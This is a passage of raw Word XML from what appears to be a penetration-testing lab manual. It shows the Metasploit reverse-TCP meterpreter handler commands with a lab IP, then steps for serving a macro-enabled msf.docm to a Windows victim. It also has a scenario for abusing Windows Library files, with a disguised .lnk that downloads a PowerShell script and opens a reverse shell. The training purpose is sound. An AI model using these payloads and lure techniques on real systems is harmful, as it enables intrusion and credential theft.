                    <w:t>data:www</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>-data</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> /var/www/html/share</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7C6DEFAF" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
                  <w:pPr>
                    <w:spacing w:before="120"/>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>cp msf.docm /var/www/html/share</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="20910BBB" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
                  <w:pPr>
                    <w:spacing w:before="120"/>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>service apache2 start</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="61C89585"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6A4CB378" wp14:editId="1B8DFF6D">
                  <wp:extent cx="3476625" cy="2415190"/>
                  <wp:effectExtent l="19050" t="19050" r="9525" b="23495"/>
                  <wp:docPr id="481882142" name="Picture 48188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3482086" cy="2418983"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="671CFA89" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>8. Execute the commands in Metasploit.</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="8791"/>
            </w:tblGrid>
            <w:tr w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w14:paraId="2BC0A59C" w14:textId="77777777" w:rsidTr="009A3A3B">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="8791" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
                </w:tcPr>
                <w:p w14:paraId="5DC45733" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
                  <w:pPr>
                    <w:spacing w:before="120"/>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:lastRenderedPageBreak/>
                    <w:t>msfconsole</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
                <w:p w14:paraId="50521BEA" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
                  <w:pPr>
                    <w:spacing w:before="120"/>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>use exploit/multi/handler</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7905B86C" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
                  <w:pPr>
                    <w:spacing w:before="120"/>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>set payload windows/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>meterpreter</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>reverse_tcp</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
                <w:p w14:paraId="6B80EDF5" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
                  <w:pPr>
                    <w:spacing w:before="120"/>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">set </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>lhost</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 192.168.100.20</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4C35D168" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
                  <w:pPr>
                    <w:spacing w:before="120"/>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">set </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>lport</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 4444</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="47AF50EE" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
                  <w:pPr>
                    <w:spacing w:before="120"/>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>run</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="189E21C6" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="05826314"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318CC39A" wp14:editId="0038BDF8">
                  <wp:extent cx="4638675" cy="2938803"/>
                  <wp:effectExtent l="19050" t="19050" r="9525" b="13970"/>
                  <wp:docPr id="481882143" name="Picture 48188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4643598" cy="2941922"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="761FA7F1" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">9. Switch to Windows 10. Open any web browser. In the address bar, type </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>http://&lt;IP_Address&gt;/share</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> and press </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Enter</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">. As soon as you press Enter, it will display the shared folder contents. Click on </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>msf.docm</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> to download the file.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="377AB2CD"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1BDC9076" wp14:editId="779ECFA3">
                  <wp:extent cx="4743450" cy="2418755"/>
                  <wp:effectExtent l="19050" t="19050" r="19050" b="19685"/>
                  <wp:docPr id="1517571072" name="Picture 151757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4749710" cy="2421947"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="792A2BD3" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">10. Click on the </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>msf.docm</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> word file to open it.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61E0372F"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2290A776" wp14:editId="22752E77">
                  <wp:extent cx="4705350" cy="1480359"/>
                  <wp:effectExtent l="19050" t="19050" r="19050" b="24765"/>
                  <wp:docPr id="1517571073" name="Picture 151757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20675" cy="1485181"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="71B1F7E3" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">11. Click on the </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Enable Editing</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> button. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="537FBC4B"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0484417C" wp14:editId="60D0D2A4">
                  <wp:extent cx="4714875" cy="2485141"/>
                  <wp:effectExtent l="19050" t="19050" r="9525" b="10795"/>
                  <wp:docPr id="1517571074" name="Picture 151757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2600" cy="2489213"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="66677AC3" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">12. Switch to the </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Kali Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> virtual machine, and you can see that </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>meterpreter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> session has already opened. Execute the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>systeminfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> command to get the system information of the attacker's machine.  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ADD6BCC"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462DB7F1" wp14:editId="62F674A3">
                  <wp:extent cx="4705350" cy="1767048"/>
                  <wp:effectExtent l="19050" t="19050" r="19050" b="24130"/>
                  <wp:docPr id="1517571075" name="Picture 151757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4717339" cy="1771550"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60F05B1A" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="00AB1F43">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="790E0230" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="00AB1F43">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc228545426"/>
      <w:r w:rsidRPr="00F00D26">
        <w:t>Lab 7-02: Abusing Windows Library Files</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="2976D204" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="00AB1F43">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc228545427"/>
      <w:r w:rsidRPr="00F00D26">
        <w:t>Scenario</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="4E63B08E" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="00AB1F43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>BluePeak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cyber Defense, a cybersecurity consulting firm, has been assigned to assess the security posture of an organization’s Windows-based environment. During the reconnaissance and phishing simulation planning phase, you discovered that employees frequently download and open shared files from email attachments and cloud storage platforms without validating their origin. Additionally, Windows Library files are not restricted by group policies, and the organization lacks proper monitoring of outbound SMB and WebDAV traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61790DE7" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="00AB1F43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">You identified that Windows Library files </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(.library</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>) can be abused to trick users into accessing remote network locations controlled by an attacker. By embedding a malicious remote path inside a Windows Library file and delivering it through social engineering techniques, an attacker can force the victim system to initiate authentication requests to an attacker-controlled server. This can result in credential leakage or relay attacks, potentially leading to unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C173A58" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="00AB1F43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Your objective is to simulate this attack in a controlled lab environment by crafting a malicious Windows Library file that references an attacker-controlled share. The purpose of this exercise is to demonstrate how attackers exploit weak user awareness, improper network segmentation, and unrestricted outbound authentication traffic to capture credentials or gain unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22264399" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="00AB1F43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Based on your findings, you will recommend disabling unnecessary outbound SMB traffic, enforcing SMB signing, applying Group Policy restrictions on library files, implementing network monitoring, and conducting security awareness training to mitigate risks associated with Windows Library file abuse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FC015A" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="00AB1F43">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc228545428"/>
      <w:r w:rsidRPr="00F00D26">
        <w:t>Solution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="4ECC9916" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="00AB1F43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BluePeak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cyber Defense hired you as a Certified Penetration Tester to conduct a controlled security assessment and demonstrate how attackers can abuse Windows Library files to capture sensitive information. The objective is to demonstrate how Windows shortcut (.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>lnk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>) files can be abused to execute a malicious PowerShell reverse shell and gain remote access to a victim system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A19AE19" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="00AB1F43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">First, all machines are powered on. A malicious shortcut file is created on the Windows Server 2025 system using File Explorer. The shortcut is configured to execute a hidden PowerShell command that downloads a remote script from the attacker’s Kali Linux machine and establishes a reverse shell connection. The attacker’s IP address is embedded in the command, and the file is renamed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Security_Update.lnk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> to appear legitimate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6638A509" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="00AB1F43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The malicious file is then delivered to the victim through a simulated social engineering method, such as email or a shared folder. On the Kali Linux system, a Python HTTP server is started to host the malicious script, and a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> listener is configured to wait for the incoming reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26202DB4" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="00AB1F43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">When the victim opens the shortcut file, the PowerShell command runs silently, downloads the script, and connects back to the attacker. After the connection is established, the attacker gains remote command execution and verifies access by running commands such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
